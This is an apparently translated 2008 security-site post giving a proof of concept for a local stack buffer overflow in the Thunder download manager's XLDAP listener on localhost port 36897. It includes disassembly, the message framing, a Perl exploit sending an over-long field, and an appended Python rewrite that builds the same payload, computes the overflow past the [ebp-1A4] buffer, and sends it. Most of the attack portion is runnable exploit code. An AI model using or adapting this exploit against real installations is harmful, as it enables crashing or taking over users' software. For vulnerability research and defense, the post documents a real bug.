Thunder local overflow POC - exploit warning - Black Bar Safety Net

ID MYHACK58:62200818999
Type myhack58
Reporter Anonymous
Modified 2008-05-08T00:00:00


By:mad Dog[B. C. T]

Thunder has had 0days before, and the ActiveX ones should mostly be gone by now, but it still cannot be neglected; better to just uninstall it. Today someone sent me a URL: it turned out to be a Thunder 0day, and the description says it is remote! That seemed odd, so let's look at the port the vulnerable service listens on:

C:\>netstat -na | find "36897"
TCP    36897    LISTENING

It is bound to the local IP, which shows this is not remote, only local.

......
23132CBE 68 B4C61323    push 2313C6B4 ; ASCII "develop this program specifically"
23132CC3 57             push edi
23132CC4 FFD6           call esi
23132CC6 59             pop ecx
23132CC7 84C0           test al, al


23132CEF 85FF           test edi, edi
23132CF1 74 02          je short 23132CF5
23132CF3 8BCF           mov ecx, edi
23132CF5 B8 D4C61323    mov eax, 2313C6D4 ; ASCII "XLDAP"
23132CFA 50             push eax
23132CFB 52             push edx
23132CFC 51             push ecx
23132CFD 50             push eax
23132CFE 8D85 5CFEFFFF  lea eax, dword ptr [ebp-1A4]
23132D04 68 C0C61323    push 2313C6C0 ; ASCII "%s|%s|%s|%s"
......

From the above we can work out that the data this port accepts has the format XLDAP|A|B|XLDAP, where A is the method and B is the value. I was too lazy to read the description; the problem is in the "develop this program specifically" method. The data structure is very simple, so the POC is as follows:

#!/usr/bin/perl
# Thunder local overflow POC: connect to the XLDAP listener on the loopback
# port and send an over-long value for the vulnerable method.
use IO::Socket;

if ($socket = IO::Socket::INET->new(PeerAddr => "localhost",
                                    PeerPort => "36897",
                                    Proto    => "TCP")) {
    # Message format: XLDAP|<method>|<value>|XLDAP
    $exploit = "XLDAP|develop this program specifically|" .
               ("A" x 397) .
               ("A" x 500) . "|XLDAP";
    print $socket $exploit;   # sent as-is, no trailing newline
    sleep(1);
    close($socket);
} else {
    print "Cannot connect to localhost:36897 port\n";
}

If you write the exp in Python you will get depressed, because py always appends an extra newline, and even using [:-1] does not help. It is not clear whether this happens while passing the data or in print; who knows the reason?

23132D09 50             push eax
23132D0A FF15 54E51323  call dword ptr [<&sprintf>] ; crash
23132D10 8D85 5CFEFFFF  lea eax, dword ptr [ebp-1A4]

The crash happens when this sprintf copies the data: its destination is the stack buffer at [ebp-1A4] loaded just above, so a formatted string longer than 0x1A4 bytes runs past the end of the buffer into the rest of the frame.
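As an added example (my code, not the author's POC), the sender below builds the XLDAP|method|value|XLDAP message described above and also answers the Python complaint: writing the bytes with socket.sendall instead of print sends exactly the payload, with no trailing newline. It also computes how far the sprintf copy would run past the [ebp-1A4] buffer shown in the disassembly. The function names, the host "localhost", and the assumption that no other locals lie between that buffer and the saved frame pointer (so 0x1A4 bytes is the most the copy can write safely) are mine; the port, the framing, the method string and the 397 + 500 'A' value come from the page.

```python
import socket

# Observed on the page: the loopback listener port and the message framing.
XLDAP_PORT = 36897
XLDAP_TAG = b"XLDAP"
# The method name exactly as the (translated) page prints it in the disassembly.
METHOD = b"develop this program specifically"
# The sprintf destination is at [ebp-1A4]; a copy longer than 0x1A4 bytes reaches
# the saved frame pointer. Assumption: no other locals sit between the buffer
# and EBP, so this is the largest copy that stays inside the buffer.
DEST_OFFSET = 0x1A4


def build_message(method, value):
    """Build XLDAP|<method>|<value>|XLDAP, the framing the listener expects."""
    for field in (method, value):
        if b"|" in field:
            raise ValueError("fields may not contain the '|' separator")
    return b"|".join((XLDAP_TAG, method, value, XLDAP_TAG))


def parse_message(msg):
    """Split a message into (method, value); reject anything not framed by XLDAP."""
    parts = msg.split(b"|")
    if len(parts) != 4 or parts[0] != XLDAP_TAG or parts[3] != XLDAP_TAG:
        raise ValueError("bad XLDAP framing")
    return parts[1], parts[2]


def sprintf_length(method, value):
    """Bytes sprintf("%s|%s|%s|%s", "XLDAP", a, b, "XLDAP") writes, NUL included."""
    return len(build_message(method, value)) + 1


def overflow_bytes(method, value, dest_offset=DEST_OFFSET):
    """How far the copy would run past the 0x1A4-byte buffer (0 when it fits)."""
    return max(0, sprintf_length(method, value) - dest_offset)


def poc_payload():
    """Same payload as the Perl POC: 397 + 500 'A's as the value."""
    return build_message(METHOD, b"A" * 397 + b"A" * 500)


def send_message(msg, host="localhost", port=XLDAP_PORT, timeout=3.0):
    """Send msg unchanged; sendall appends nothing. Returns False if connect fails."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(msg)
        return True
    except OSError:
        return False


if __name__ == "__main__":
    payload = poc_payload()
    print("payload: %d bytes, runs %d bytes past the buffer"
          % (len(payload), overflow_bytes(METHOD, b"A" * 897)))
    if not send_message(payload):
        print("Cannot connect to localhost:%d port" % XLDAP_PORT)
```

Run it on the machine where Thunder is listening on 36897; on any other host it reports the connection failure instead of sending. The length arithmetic is the useful part even without a target: with the POC's 897-byte value the formatted string is several hundred bytes longer than the distance from the buffer to EBP, which is why the copy cannot stay inside the frame.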